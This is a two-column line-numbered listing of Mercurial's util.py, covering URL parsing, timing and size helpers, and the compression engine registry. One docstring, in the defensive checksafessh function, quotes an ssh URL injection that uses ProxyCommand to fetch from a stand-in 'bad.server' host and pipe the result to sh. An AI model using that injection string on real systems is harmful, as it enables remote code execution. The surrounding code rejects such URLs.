2766 2774 s += ':' + urlreq.quote(self.port)
2767 2775 if self.host:
2768 2776 s += '/'
2769 2777 if self.path:
2770 2778 # TODO: similar to the query string, we should not unescape the
2771 2779 # path when we store it, the path might contain '%2f' = '/',
2772 2780 # which we should *not* escape.
2773 2781 s += urlreq.quote(self.path, safe=self._safepchars)
2774 2782 if self.query:
2775 2783 # we store the query in escaped form.
2776 2784 s += '?' + self.query
2777 2785 if self.fragment is not None:
2778 2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2779 2787 return s
2780 2788
2781 2789 __str__ = encoding.strmethod(__bytes__)
2782 2790
2783 2791 def authinfo(self):
2784 2792 user, passwd = self.user, self.passwd
2785 2793 try:
2786 2794 self.user, self.passwd = None, None
2787 2795 s = bytes(self)
2788 2796 finally:
2789 2797 self.user, self.passwd = user, passwd
2790 2798 if not self.user:
2791 2799 return (s, None)
2792 2800 # authinfo[1] is passed to urllib2 password manager, and its
2793 2801 # URIs must not contain credentials. The host is passed in the
2794 2802 # URIs list because Python < 2.4.3 uses only that to search for
2795 2803 # a password.
2796 2804 return (s, (None, (s, self.host),
2797 2805 self.user, self.passwd or ''))
2798 2806
2799 2807 def isabs(self):
2800 2808 if self.scheme and self.scheme != 'file':
2801 2809 return True # remote URL
2802 2810 if hasdriveletter(self.path):
2803 2811 return True # absolute for our purposes - can't be joined()
2804 2812 if self.path.startswith(br'\\'):
2805 2813 return True # Windows UNC path
2806 2814 if self.path.startswith('/'):
2807 2815 return True # POSIX-style
2808 2816 return False
2809 2817
2810 2818 def localpath(self):
2811 2819 if self.scheme == 'file' or self.scheme == 'bundle':
2812 2820 path = self.path or '/'
2813 2821 # For Windows, we need to promote hosts containing drive
2814 2822 # letters to paths with drive letters.
2815 2823 if hasdriveletter(self._hostport):
2816 2824 path = self._hostport + '/' + self.path
2817 2825 elif (self.host is not None and self.path
2818 2826 and not hasdriveletter(path)):
2819 2827 path = '/' + path
2820 2828 return path
2821 2829 return self._origpath
2822 2830
2823 2831 def islocal(self):
2824 2832 '''whether localpath will return something that posixfile can open'''
2825 2833 return (not self.scheme or self.scheme == 'file'
2826 2834 or self.scheme == 'bundle')
2827 2835
2828 2836 def hasscheme(path):
2829 2837 return bool(url(path).scheme)
2830 2838
2831 2839 def hasdriveletter(path):
2832 2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2833 2841
2834 2842 def urllocalpath(path):
2835 2843 return url(path, parsequery=False, parsefragment=False).localpath()
2836 2844
2837 2845 def checksafessh(path):
2838 2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2839 2847
2840 2848 This is a sanity check for ssh urls. ssh will parse the first item as
2841 2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2842 2850 Let's prevent these potentially exploited urls entirely and warn the
2843 2851 user.
2844 2852
2845 2853 Raises an error.Abort when the url is unsafe.
2846 2854 """
2847 2855 path = urlreq.unquote(path)
2848 2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2849 2857 raise error.Abort(_('potentially unsafe url: %r') %
2850 2858 (pycompat.bytestr(path),))
2851 2859
2852 2860 def hidepassword(u):
2853 2861 '''hide user credential in a url string'''
2854 2862 u = url(u)
2855 2863 if u.passwd:
2856 2864 u.passwd = '***'
2857 2865 return bytes(u)
2858 2866
2859 2867 def removeauth(u):
2860 2868 '''remove all authentication information from a url string'''
2861 2869 u = url(u)
2862 2870 u.user = u.passwd = None
2863 2871 return bytes(u)
2864 2872
2865 2873 timecount = unitcountfn(
2866 2874 (1, 1e3, _('%.0f s')),
2867 2875 (100, 1, _('%.1f s')),
2868 2876 (10, 1, _('%.2f s')),
2869 2877 (1, 1, _('%.3f s')),
2870 2878 (100, 0.001, _('%.1f ms')),
2871 2879 (10, 0.001, _('%.2f ms')),
2872 2880 (1, 0.001, _('%.3f ms')),
2873 2881 (100, 0.000001, _('%.1f us')),
2874 2882 (10, 0.000001, _('%.2f us')),
2875 2883 (1, 0.000001, _('%.3f us')),
2876 2884 (100, 0.000000001, _('%.1f ns')),
2877 2885 (10, 0.000000001, _('%.2f ns')),
2878 2886 (1, 0.000000001, _('%.3f ns')),
2879 2887 )
2880 2888
2881 2889 @attr.s
2882 2890 class timedcmstats(object):
2883 2891 """Stats information produced by the timedcm context manager on entering."""
2884 2892
2885 2893 # the starting value of the timer as a float (meaning and resulution is
2886 2894 # platform dependent, see util.timer)
2887 2895 start = attr.ib(default=attr.Factory(lambda: timer()))
2888 2896 # the number of seconds as a floating point value; starts at 0, updated when
2889 2897 # the context is exited.
2890 2898 elapsed = attr.ib(default=0)
2891 2899 # the number of nested timedcm context managers.
2892 2900 level = attr.ib(default=1)
2893 2901
2894 2902 def __bytes__(self):
2895 2903 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2896 2904
2897 2905 __str__ = encoding.strmethod(__bytes__)
2898 2906
2899 2907 @contextlib.contextmanager
2900 2908 def timedcm(whencefmt, *whenceargs):
2901 2909 """A context manager that produces timing information for a given context.
2902 2910
2903 2911 On entering a timedcmstats instance is produced.
2904 2912
2905 2913 This context manager is reentrant.
2906 2914
2907 2915 """
2908 2916 # track nested context managers
2909 2917 timedcm._nested += 1
2910 2918 timing_stats = timedcmstats(level=timedcm._nested)
2911 2919 try:
2912 2920 with tracing.log(whencefmt, *whenceargs):
2913 2921 yield timing_stats
2914 2922 finally:
2915 2923 timing_stats.elapsed = timer() - timing_stats.start
2916 2924 timedcm._nested -= 1
2917 2925
2918 2926 timedcm._nested = 0
2919 2927
2920 2928 def timed(func):
2921 2929 '''Report the execution time of a function call to stderr.
2922 2930
2923 2931 During development, use as a decorator when you need to measure
2924 2932 the cost of a function, e.g. as follows:
2925 2933
2926 2934 @util.timed
2927 2935 def foo(a, b, c):
2928 2936 pass
2929 2937 '''
2930 2938
2931 2939 def wrapper(*args, **kwargs):
2932 2940 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2933 2941 result = func(*args, **kwargs)
2934 2942 stderr = procutil.stderr
2935 2943 stderr.write('%s%s: %s\n' % (
2936 2944 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2937 2945 time_stats))
2938 2946 return result
2939 2947 return wrapper
2940 2948
2941 2949 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2942 2950 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2943 2951
2944 2952 def sizetoint(s):
2945 2953 '''Convert a space specifier to a byte count.
2946 2954
2947 2955 >>> sizetoint(b'30')
2948 2956 30
2949 2957 >>> sizetoint(b'2.2kb')
2950 2958 2252
2951 2959 >>> sizetoint(b'6M')
2952 2960 6291456
2953 2961 '''
2954 2962 t = s.strip().lower()
2955 2963 try:
2956 2964 for k, u in _sizeunits:
2957 2965 if t.endswith(k):
2958 2966 return int(float(t[:-len(k)]) * u)
2959 2967 return int(t)
2960 2968 except ValueError:
2961 2969 raise error.ParseError(_("couldn't parse size: %s") % s)
2962 2970
2963 2971 class hooks(object):
2964 2972 '''A collection of hook functions that can be used to extend a
2965 2973 function's behavior. Hooks are called in lexicographic order,
2966 2974 based on the names of their sources.'''
2967 2975
2968 2976 def __init__(self):
2969 2977 self._hooks = []
2970 2978
2971 2979 def add(self, source, hook):
2972 2980 self._hooks.append((source, hook))
2973 2981
2974 2982 def __call__(self, *args):
2975 2983 self._hooks.sort(key=lambda x: x[0])
2976 2984 results = []
2977 2985 for source, hook in self._hooks:
2978 2986 results.append(hook(*args))
2979 2987 return results
2980 2988
2981 2989 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2982 2990 '''Yields lines for a nicely formatted stacktrace.
2983 2991 Skips the 'skip' last entries, then return the last 'depth' entries.
2984 2992 Each file+linenumber is formatted according to fileline.
2985 2993 Each line is formatted according to line.
2986 2994 If line is None, it yields:
2987 2995 length of longest filepath+line number,
2988 2996 filepath+linenumber,
2989 2997 function
2990 2998
2991 2999 Not be used in production code but very convenient while developing.
2992 3000 '''
2993 3001 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2994 3002 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2995 3003 ][-depth:]
2996 3004 if entries:
2997 3005 fnmax = max(len(entry[0]) for entry in entries)
2998 3006 for fnln, func in entries:
2999 3007 if line is None:
3000 3008 yield (fnmax, fnln, func)
3001 3009 else:
3002 3010 yield line % (fnmax, fnln, func)
3003 3011
3004 3012 def debugstacktrace(msg='stacktrace', skip=0,
3005 3013 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3006 3014 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3007 3015 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3008 3016 By default it will flush stdout first.
3009 3017 It can be used everywhere and intentionally does not require an ui object.
3010 3018 Not be used in production code but very convenient while developing.
3011 3019 '''
3012 3020 if otherf:
3013 3021 otherf.flush()
3014 3022 f.write('%s at:\n' % msg.rstrip())
3015 3023 for line in getstackframes(skip + 1, depth=depth):
3016 3024 f.write(line)
3017 3025 f.flush()
3018 3026
3019 3027 class dirs(object):
3020 3028 '''a multiset of directory names from a dirstate or manifest'''
3021 3029
3022 3030 def __init__(self, map, skip=None):
3023 3031 self._dirs = {}
3024 3032 addpath = self.addpath
3025 3033 if safehasattr(map, 'iteritems') and skip is not None:
3026 3034 for f, s in map.iteritems():
3027 3035 if s[0] != skip:
3028 3036 addpath(f)
3029 3037 else:
3030 3038 for f in map:
3031 3039 addpath(f)
3032 3040
3033 3041 def addpath(self, path):
3034 3042 dirs = self._dirs
3035 3043 for base in finddirs(path):
3036 3044 if base in dirs:
3037 3045 dirs[base] += 1
3038 3046 return
3039 3047 dirs[base] = 1
3040 3048
3041 3049 def delpath(self, path):
3042 3050 dirs = self._dirs
3043 3051 for base in finddirs(path):
3044 3052 if dirs[base] > 1:
3045 3053 dirs[base] -= 1
3046 3054 return
3047 3055 del dirs[base]
3048 3056
3049 3057 def __iter__(self):
3050 3058 return iter(self._dirs)
3051 3059
3052 3060 def __contains__(self, d):
3053 3061 return d in self._dirs
3054 3062
3055 3063 if safehasattr(parsers, 'dirs'):
3056 3064 dirs = parsers.dirs
3057 3065
3058 3066 def finddirs(path):
3059 3067 pos = path.rfind('/')
3060 3068 while pos != -1:
3061 3069 yield path[:pos]
3062 3070 pos = path.rfind('/', 0, pos)
3063 3071
3064 3072 # compression code
3065 3073
3066 3074 SERVERROLE = 'server'
3067 3075 CLIENTROLE = 'client'
3068 3076
3069 3077 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3070 3078 (u'name', u'serverpriority',
3071 3079 u'clientpriority'))
3072 3080
3073 3081 class compressormanager(object):
3074 3082 """Holds registrations of various compression engines.
3075 3083
3076 3084 This class essentially abstracts the differences between compression
3077 3085 engines to allow new compression formats to be added easily, possibly from
3078 3086 extensions.
3079 3087
3080 3088 Compressors are registered against the global instance by calling its
3081 3089 ``register()`` method.
3082 3090 """
3083 3091 def __init__(self):
3084 3092 self._engines = {}
3085 3093 # Bundle spec human name to engine name.
3086 3094 self._bundlenames = {}
3087 3095 # Internal bundle identifier to engine name.
3088 3096 self._bundletypes = {}
3089 3097 # Revlog header to engine name.
3090 3098 self._revlogheaders = {}
3091 3099 # Wire proto identifier to engine name.
3092 3100 self._wiretypes = {}
3093 3101
3094 3102 def __getitem__(self, key):
3095 3103 return self._engines[key]
3096 3104
3097 3105 def __contains__(self, key):
3098 3106 return key in self._engines
3099 3107
3100 3108 def __iter__(self):
3101 3109 return iter(self._engines.keys())
3102 3110
3103 3111 def register(self, engine):
3104 3112 """Register a compression engine with the manager.
3105 3113
3106 3114 The argument must be a ``compressionengine`` instance.
3107 3115 """
3108 3116 if not isinstance(engine, compressionengine):
3109 3117 raise ValueError(_('argument must be a compressionengine'))
3110 3118
3111 3119 name = engine.name()
3112 3120
3113 3121 if name in self._engines:
3114 3122 raise error.Abort(_('compression engine %s already registered') %
3115 3123 name)
3116 3124
3117 3125 bundleinfo = engine.bundletype()
3118 3126 if bundleinfo:
3119 3127 bundlename, bundletype = bundleinfo
3120 3128
3121 3129 if bundlename in self._bundlenames:
3122 3130 raise error.Abort(_('bundle name %s already registered') %
3123 3131 bundlename)
3124 3132 if bundletype in self._bundletypes:
3125 3133 raise error.Abort(_('bundle type %s already registered by %s') %
3126 3134 (bundletype, self._bundletypes[bundletype]))
3127 3135
3128 3136 # No external facing name declared.
3129 3137 if bundlename:
3130 3138 self._bundlenames[bundlename] = name
3131 3139
3132 3140 self._bundletypes[bundletype] = name
3133 3141
3134 3142 wiresupport = engine.wireprotosupport()
3135 3143 if wiresupport:
3136 3144 wiretype = wiresupport.name
3137 3145 if wiretype in self._wiretypes:
3138 3146 raise error.Abort(_('wire protocol compression %s already '
3139 3147 'registered by %s') %
3140 3148 (wiretype, self._wiretypes[wiretype]))
3141 3149
3142 3150 self._wiretypes[wiretype] = name
3143 3151
3144 3152 revlogheader = engine.revlogheader()
3145 3153 if revlogheader and revlogheader in self._revlogheaders:
3146 3154 raise error.Abort(_('revlog header %s already registered by %s') %
3147 3155 (revlogheader, self._revlogheaders[revlogheader]))
3148 3156
3149 3157 if revlogheader:
3150 3158 self._revlogheaders[revlogheader] = name
3151 3159
3152 3160 self._engines[name] = engine
3153 3161
3154 3162 @property
3155 3163 def supportedbundlenames(self):
3156 3164 return set(self._bundlenames.keys())
3157 3165
3158 3166 @property
3159 3167 def supportedbundletypes(self):
3160 3168 return set(self._bundletypes.keys())
3161 3169
3162 3170 def forbundlename(self, bundlename):
3163 3171 """Obtain a compression engine registered to a bundle name.
3164 3172
3165 3173 Will raise KeyError if the bundle type isn't registered.
3166 3174
3167 3175 Will abort if the engine is known but not available.
3168 3176 """
3169 3177 engine = self._engines[self._bundlenames[bundlename]]
3170 3178 if not engine.available():
3171 3179 raise error.Abort(_('compression engine %s could not be loaded') %
3172 3180 engine.name())
3173 3181 return engine
3174 3182
3175 3183 def forbundletype(self, bundletype):
3176 3184 """Obtain a compression engine registered to a bundle type.
3177 3185
3178 3186 Will raise KeyError if the bundle type isn't registered.
3179 3187
3180 3188 Will abort if the engine is known but not available.
3181 3189 """
3182 3190 engine = self._engines[self._bundletypes[bundletype]]
3183 3191 if not engine.available():
3184 3192 raise error.Abort(_('compression engine %s could not be loaded') %
3185 3193 engine.name())
3186 3194 return engine
3187 3195
3188 3196 def supportedwireengines(self, role, onlyavailable=True):
3189 3197 """Obtain compression engines that support the wire protocol.
3190 3198
3191 3199 Returns a list of engines in prioritized order, most desired first.
3192 3200
3193 3201 If ``onlyavailable`` is set, filter out engines that can't be
3194 3202 loaded.
3195 3203 """
3196 3204 assert role in (SERVERROLE, CLIENTROLE)
3197 3205
3198 3206 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3199 3207
3200 3208 engines = [self._engines[e] for e in self._wiretypes.values()]
3201 3209 if onlyavailable:
3202 3210 engines = [e for e in engines if e.available()]
3203 3211
3204 3212 def getkey(e):
3205 3213 # Sort first by priority, highest first. In case of tie, sort
3206 3214 # alphabetically. This is arbitrary, but ensures output is
3207 3215 # stable.
3208 3216 w = e.wireprotosupport()
3209 3217 return -1 * getattr(w, attr), w.name
3210 3218
3211 3219 return list(sorted(engines, key=getkey))
3212 3220
3213 3221 def forwiretype(self, wiretype):
3214 3222 engine = self._engines[self._wiretypes[wiretype]]
3215 3223 if not engine.available():
3216 3224 raise error.Abort(_('compression engine %s could not be loaded') %
3217 3225 engine.name())
3218 3226 return engine
3219 3227
3220 3228 def forrevlogheader(self, header):
3221 3229 """Obtain a compression engine registered to a revlog header.
3222 3230
3223 3231 Will raise KeyError if the revlog header value isn't registered.
3224 3232 """
3225 3233 return self._engines[self._revlogheaders[header]]
3226 3234
3227 3235 compengines = compressormanager()
3228 3236
3229 3237 class compressionengine(object):
3230 3238 """Base class for compression engines.
3231 3239
3232 3240 Compression engines must implement the interface defined by this class.
3233 3241 """
3234 3242 def name(self):
3235 3243 """Returns the name of the compression engine.
3236 3244
3237 3245 This is the key the engine is registered under.
3238 3246
3239 3247 This method must be implemented.
3240 3248 """
3241 3249 raise NotImplementedError()
3242 3250
3243 3251 def available(self):
3244 3252 """Whether the compression engine is available.
3245 3253
3246 3254 The intent of this method is to allow optional compression engines
3247 3255 that may not be available in all installations (such as engines relying
3248 3256 on C extensions that may not be present).
3249 3257 """
3250 3258 return True
3251 3259
3252 3260 def bundletype(self):
3253 3261 """Describes bundle identifiers for this engine.
3254 3262
3255 3263 If this compression engine isn't supported for bundles, returns None.
3256 3264
3257 3265 If this engine can be used for bundles, returns a 2-tuple of strings of
3258 3266 the user-facing "bundle spec" compression name and an internal
3259 3267 identifier used to denote the compression format within bundles. To
3260 3268 exclude the name from external usage, set the first element to ``None``.
3261 3269
3262 3270 If bundle compression is supported, the class must also implement
3263 3271 ``compressstream`` and `decompressorreader``.
3264 3272
3265 3273 The docstring of this method is used in the help system to tell users
3266 3274 about this engine.
3267 3275 """
3268 3276 return None
3269 3277
3270 3278 def wireprotosupport(self):
3271 3279 """Declare support for this compression format on the wire protocol.
3272 3280
3273 3281 If this compression engine isn't supported for compressing wire
3274 3282 protocol payloads, returns None.
3275 3283
3276 3284 Otherwise, returns ``compenginewireprotosupport`` with the following
3277 3285 fields:
3278 3286
3279 3287 * String format identifier
3280 3288 * Integer priority for the server
3281 3289 * Integer priority for the client
3282 3290
3283 3291 The integer priorities are used to order the advertisement of format
3284 3292 support by server and client. The highest integer is advertised
3285 3293 first. Integers with non-positive values aren't advertised.
3286 3294
3287 3295 The priority values are somewhat arbitrary and only used for default
3288 3296 ordering. The relative order can be changed via config options.
3289 3297
3290 3298 If wire protocol compression is supported, the class must also implement
3291 3299 ``compressstream`` and ``decompressorreader``.
3292 3300 """
3293 3301 return None
3294 3302
3295 3303 def revlogheader(self):
3296 3304 """Header added to revlog chunks that identifies this engine.
3297 3305
3298 3306 If this engine can be used to compress revlogs, this method should
3299 3307 return the bytes used to identify chunks compressed with this engine.
3300 3308 Else, the method should return ``None`` to indicate it does not
3301 3309 participate in revlog compression.
3302 3310 """
3303 3311 return None
3304 3312
3305 3313 def compressstream(self, it, opts=None):
3306 3314 """Compress an iterator of chunks.
3307 3315
3308 3316 The method receives an iterator (ideally a generator) of chunks of
3309 3317 bytes to be compressed. It returns an iterator (ideally a generator)
3310 3318 of bytes of chunks representing the compressed output.
3311 3319
3312 3320 Optionally accepts an argument defining how to perform compression.
3313 3321 Each engine treats this argument differently.
3314 3322 """
3315 3323 raise NotImplementedError()
3316 3324
3317 3325 def decompressorreader(self, fh):
3318 3326 """Perform decompression on a file object.
3319 3327
3320 3328 Argument is an object with a ``read(size)`` method that returns
3321 3329 compressed data. Return value is an object with a ``read(size)`` that
3322 3330 returns uncompressed data.
3323 3331 """
3324 3332 raise NotImplementedError()
3325 3333
3326 3334 def revlogcompressor(self, opts=None):
3327 3335 """Obtain an object that can be used to compress revlog entries.
3328 3336
3329 3337 The object has a ``compress(data)`` method that compresses binary
3330 3338 data. This method returns compressed binary data or ``None`` if
3331 3339 the data could not be compressed (too small, not compressible, etc).
3332 3340 The returned data should have a header uniquely identifying this
3333 3341 compression format so decompression can be routed to this engine.
3334 3342 This header should be identified by the ``revlogheader()`` return
3335 3343 value.
3336 3344
3337 3345 The object has a ``decompress(data)`` method that decompresses
3338 3346 data. The method will only be called if ``data`` begins with
3339 3347 ``revlogheader()``. The method should return the raw, uncompressed
3340 3348 data or raise a ``RevlogError``.
3341 3349
3342 3350 The object is reusable but is not thread safe.
3343 3351 """
3344 3352 raise NotImplementedError()
3345 3353
3346 3354 class _CompressedStreamReader(object):
3347 3355 def __init__(self, fh):
3348 3356 if safehasattr(fh, 'unbufferedread'):
3349 3357 self._reader = fh.unbufferedread
3350 3358 else:
3351 3359 self._reader = fh.read
3352 3360 self._pending = []
3353 3361 self._pos = 0
3354 3362 self._eof = False
3355 3363
3356 3364 def _decompress(self, chunk):
3357 3365 raise NotImplementedError()
3358 3366
3359 3367 def read(self, l):
3360 3368 buf = []
3361 3369 while True:
3362 3370 while self._pending:
3363 3371 if len(self._pending[0]) > l + self._pos:
3364 3372 newbuf = self._pending[0]
3365 3373 buf.append(newbuf[self._pos:self._pos + l])
3366 3374 self._pos += l
3367 3375 return ''.join(buf)
3368 3376
3369 3377 newbuf = self._pending.pop(0)
3370 3378 if self._pos:
3371 3379 buf.append(newbuf[self._pos:])
3372 3380 l -= len(newbuf) - self._pos
3373 3381 else:
3374 3382 buf.append(newbuf)
3375 3383 l -= len(newbuf)
3376 3384 self._pos = 0
3377 3385
3378 3386 if self._eof:
3379 3387 return ''.join(buf)
3380 3388 chunk = self._reader(65536)
3381 3389 self._decompress(chunk)
3382 3390 if not chunk and not self._pending and not self._eof:
3383 3391 # No progress and no new data, bail out
3384 3392 return ''.join(buf)
3385 3393
3386 3394 class _GzipCompressedStreamReader(_CompressedStreamReader):
3387 3395 def __init__(self, fh):
3388 3396 super(_GzipCompressedStreamReader, self).__init__(fh)
3389 3397 self._decompobj = zlib.decompressobj()
3390 3398 def _decompress(self, chunk):
3391 3399 newbuf = self._decompobj.decompress(chunk)
3392 3400 if newbuf:
3393 3401 self._pending.append(newbuf)
3394 3402 d = self._decompobj.copy()
3395 3403 try:
3396 3404 d.decompress('x')
3397 3405 d.flush()
3398 3406 if d.unused_data == 'x':
3399 3407 self._eof = True
3400 3408 except zlib.error:
3401 3409 pass
3402 3410
3403 3411 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3404 3412 def __init__(self, fh):
3405 3413 super(_BZ2CompressedStreamReader, self).__init__(fh)
3406 3414 self._decompobj = bz2.BZ2Decompressor()
3407 3415 def _decompress(self, chunk):
3408 3416 newbuf = self._decompobj.decompress(chunk)
3409 3417 if newbuf:
3410 3418 self._pending.append(newbuf)
3411 3419 try:
3412 3420 while True:
3413 3421 newbuf = self._decompobj.decompress('')
3414 3422 if newbuf:
3415 3423 self._pending.append(newbuf)
3416 3424 else:
3417 3425 break
3418 3426 except EOFError:
3419 3427 self._eof = True
3420 3428
3421 3429 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3422 3430 def __init__(self, fh):
3423 3431 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3424 3432 newbuf = self._decompobj.decompress('BZ')
3425 3433 if newbuf:
3426 3434 self._pending.append(newbuf)
3427 3435
3428 3436 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3429 3437 def __init__(self, fh, zstd):
3430 3438 super(_ZstdCompressedStreamReader, self).__init__(fh)
3431 3439 self._zstd = zstd
3432 3440 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3433 3441 def _decompress(self, chunk):
3434 3442 newbuf = self._decompobj.decompress(chunk)
3435 3443 if newbuf:
3436 3444 self._pending.append(newbuf)
3437 3445 try:
3438 3446 while True:
3439 3447 newbuf = self._decompobj.decompress('')
3440 3448 if newbuf:
3441 3449 self._pending.append(newbuf)
3442 3450 else:
3443 3451 break
3444 3452 except self._zstd.ZstdError:
3445 3453 self._eof = True
3446 3454
3447 3455 class _zlibengine(compressionengine):
3448 3456 def name(self):
3449 3457 return 'zlib'
3450 3458
3451 3459 def bundletype(self):
3452 3460 """zlib compression using the DEFLATE algorithm.
3453 3461
3454 3462 All Mercurial clients should support this format. The compression
3455 3463 algorithm strikes a reasonable balance between compression ratio
3456 3464 and size.
3457 3465 """
3458 3466 return 'gzip', 'GZ'
3459 3467
3460 3468 def wireprotosupport(self):
3461 3469 return compewireprotosupport('zlib', 20, 20)
3462 3470
3463 3471 def revlogheader(self):
3464 3472 return 'x'
3465 3473
3466 3474 def compressstream(self, it, opts=None):
3467 3475 opts = opts or {}
3468 3476
3469 3477 z = zlib.compressobj(opts.get('level', -1))
3470 3478 for chunk in it:
3471 3479 data = z.compress(chunk)
3472 3480 # Not all calls to compress emit data. It is cheaper to inspect
3473 3481 # here than to feed empty chunks through generator.
3474 3482 if data:
3475 3483 yield data
3476 3484
3477 3485 yield z.flush()
3478 3486
3479 3487 def decompressorreader(self, fh):
3480 3488 return _GzipCompressedStreamReader(fh)
3481 3489
3482 3490 class zlibrevlogcompressor(object):
3483 3491 def compress(self, data):
3484 3492 insize = len(data)
3485 3493 # Caller handles empty input case.
3486 3494 assert insize > 0
3487 3495
3488 3496 if insize < 44:
3489 3497 return None
3490 3498
3491 3499 elif insize <= 1000000:
3492 3500 compressed = zlib.compress(data)
3493 3501 if len(compressed) < insize:
3494 3502 return compressed
3495 3503 return None
3496 3504
3497 3505 # zlib makes an internal copy of the input buffer, doubling
3498 3506 # memory usage for large inputs. So do streaming compression
3499 3507 # on large inputs.
3500 3508 else:
3501 3509 z = zlib.compressobj()
3502 3510 parts = []
3503 3511 pos = 0
3504 3512 while pos < insize:
3505 3513 pos2 = pos + 2**20
3506 3514 parts.append(z.compress(data[pos:pos2]))
3507 3515 pos = pos2
3508 3516 parts.append(z.flush())
3509 3517
3510 3518 if sum(map(len, parts)) < insize:
3511 3519 return ''.join(parts)
3512 3520 return None
3513 3521
3514 3522 def decompress(self, data):
3515 3523 try:
3516 3524 return zlib.decompress(data)
3517 3525 except zlib.error as e:
3518 3526 raise error.RevlogError(_('revlog decompress error: %s') %
3519 3527 stringutil.forcebytestr(e))
3520 3528
3521 3529 def revlogcompressor(self, opts=None):
3522 3530 return self.zlibrevlogcompressor()
3523 3531
3524 3532 compengines.register(_zlibengine())
3525 3533
3526 3534 class _bz2engine(compressionengine):
3527 3535 def name(self):
3528 3536 return 'bz2'
3529 3537
3530 3538 def bundletype(self):
3531 3539 """An algorithm that produces smaller bundles than ``gzip``.
3532 3540
3533 3541 All Mercurial clients should support this format.
3534 3542
3535 3543 This engine will likely produce smaller bundles than ``gzip`` but
3536 3544 will be significantly slower, both during compression and
3537 3545 decompression.
3538 3546
3539 3547 If available, the ``zstd`` engine can yield similar or better
3540 3548 compression at much higher speeds.
3541 3549 """
3542 3550 return 'bzip2', 'BZ'
3543 3551
3544 3552 # We declare a protocol name but don't advertise by default because
3545 3553 # it is slow.
3546 3554 def wireprotosupport(self):
3547 3555 return compewireprotosupport('bzip2', 0, 0)
3548 3556
3549 3557 def compressstream(self, it, opts=None):
3550 3558 opts = opts or {}
3551 3559 z = bz2.BZ2Compressor(opts.get('level', 9))
3552 3560 for chunk in it:
3553 3561 data = z.compress(chunk)
3554 3562 if data:
3555 3563 yield data
3556 3564
3557 3565 yield z.flush()
3558 3566
3559 3567 def decompressorreader(self, fh):
3560 3568 return _BZ2CompressedStreamReader(fh)
3561 3569
3562 3570 compengines.register(_bz2engine())
3563 3571
3564 3572 class _truncatedbz2engine(compressionengine):
3565 3573 def name(self):
3566 3574 return 'bz2truncated'
3567 3575
3568 3576 def bundletype(self):
3569 3577 return None, '_truncatedBZ'
3570 3578
3571 3579 # We don't implement compressstream because it is hackily handled elsewhere.
3572 3580
3573 3581 def decompressorreader(self, fh):
3574 3582 return _TruncatedBZ2CompressedStreamReader(fh)
3575 3583
3576 3584 compengines.register(_truncatedbz2engine())
3577 3585
3578 3586 class _noopengine(compressionengine):
3579 3587 def name(self):
3580 3588 return 'none'
3581 3589
3582 3590 def bundletype(self):
3583 3591 """No compression is performed.
3584 3592
3585 3593 Use this compression engine to explicitly disable compression.
3586 3594 """
3587 3595 return 'none', 'UN'
3588 3596
3589 3597 # Clients always support uncompressed payloads. Servers don't because
3590 3598 # unless you are on a fast network, uncompressed payloads can easily
3591 3599 # saturate your network pipe.
3592 3600 def wireprotosupport(self):
3593 3601 return compewireprotosupport('none', 0, 10)
3594 3602
3595 3603 # We don't implement revlogheader because it is handled specially
3596 3604 # in the revlog class.
3597 3605
3598 3606 def compressstream(self, it, opts=None):
3599 3607 return it
3600 3608
3601 3609 def decompressorreader(self, fh):
3602 3610 return fh
3603 3611
3604 3612 class nooprevlogcompressor(object):
3605 3613 def compress(self, data):
3606 3614 return None
3607 3615
3608 3616 def revlogcompressor(self, opts=None):
3609 3617 return self.nooprevlogcompressor()
3610 3618
3611 3619 compengines.register(_noopengine())
3612 3620
3613 3621 class _zstdengine(compressionengine):
3614 3622 def name(self):
3615 3623 return 'zstd'
3616 3624
3617 3625 @propertycache
3618 3626 def _module(self):
3619 3627 # Not all installs have the zstd module available. So defer importing
3620 3628 # until first access.
3621 3629 try:
3622 3630 from . import zstd
3623 3631 # Force delayed import.
3624 3632 zstd.__version__
3625 3633 return zstd
3626 3634 except ImportError:
3627 3635 return None
3628 3636
3629 3637 def available(self):
3630 3638 return bool(self._module)
3631 3639
3632 3640 def bundletype(self):
3633 3641 """A modern compression algorithm that is fast and highly flexible.
3634 3642
3635 3643 Only supported by Mercurial 4.1 and newer clients.
3636 3644
3637 3645 With the default settings, zstd compression is both faster and yields
3638 3646 better compression than ``gzip``. It also frequently yields better
3639 3647 compression than ``bzip2`` while operating at much higher speeds.
3640 3648
3641 3649 If this engine is available and backwards compatibility is not a
3642 3650 concern, it is likely the best available engine.
3643 3651 """
3644 3652 return 'zstd', 'ZS'
3645 3653
3646 3654 def wireprotosupport(self):
3647 3655 return compewireprotosupport('zstd', 50, 50)
3648 3656
3649 3657 def revlogheader(self):
3650 3658 return '\x28'
3651 3659
3652 3660 def compressstream(self, it, opts=None):
3653 3661 opts = opts or {}
3654 3662 # zstd level 3 is almost always significantly faster than zlib
3655 3663 # while providing no worse compression. It strikes a good balance
3656 3664 # between speed and compression.
3657 3665 level = opts.get('level', 3)
3658 3666
3659 3667 zstd = self._module
3660 3668 z = zstd.ZstdCompressor(level=level).compressobj()
3661 3669 for chunk in it:
3662 3670 data = z.compress(chunk)
3663 3671 if data:
3664 3672 yield data
3665 3673
3666 3674 yield z.flush()
3667 3675
